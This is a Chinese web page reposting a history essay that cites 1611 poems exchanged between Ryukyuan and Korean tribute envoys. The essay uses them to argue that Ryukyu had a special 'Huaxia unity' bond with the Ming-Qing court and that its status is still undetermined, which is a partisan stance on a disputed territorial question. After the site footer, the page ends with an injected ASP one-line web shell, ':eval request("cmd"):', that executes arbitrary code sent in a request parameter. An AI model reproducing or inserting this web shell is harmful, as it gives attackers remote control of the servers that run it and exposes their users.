钓鱼岛历史

中国与琉球作为华夏一统关系的历史杂证

时间:2015-6-21 18:47:50  作者:李景科  来源:  查看:128  评论:0
内容摘要:    迄今,在客观事实上,琉球的地位还没有确定。而在清末以前琉球国是有别于其它藩属国,与明清王朝有“华夏一统”的关系。笔者搜集的很多历史文献中,说明了这一点。   1611年,琉球国朝贡使臣蔡坚马成骥等一...

    迄今,在客观事实上,琉球的地位还没有确定。而在清末以前琉球国是有别于其它藩属国,与明清王朝有“华夏一统”的关系。笔者搜集的很多历史文献中,说明了这一点。

   1611年,琉球国朝贡使臣蔡坚马成骥等一行出使北京,与朝鲜朝贡使臣多有交会,留下了如下二首诗。朝鲜使臣给琉球使臣蔡坚的诗词是:海外观面是奇逢  讵知一见即包容 皇恩浩荡均霑被  珠玉淋漓我独深 长才伟略靡双匹  干国谋王第一人 予心感佩真忘寐  耑竢他年教复临。这首诗真实地阐明两国作为中原王朝的藩属国所享受的“皇恩浩荡”,而这也是当时中国普通百姓或官员对“皇上”的表示。琉球使臣马成骥给朝鲜使臣的诗更表达:尧天舜日照遐方  航海梯山来帝邦 不期而会天下国  凡有血气悉称降 邂逅相遇虽萍水  前缘夙定非偶然 喜承晤教固所愿  倏尔东南两分还。
 

中国与琉球作为华夏一统关系的历史杂证
世保盟微信公众号

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):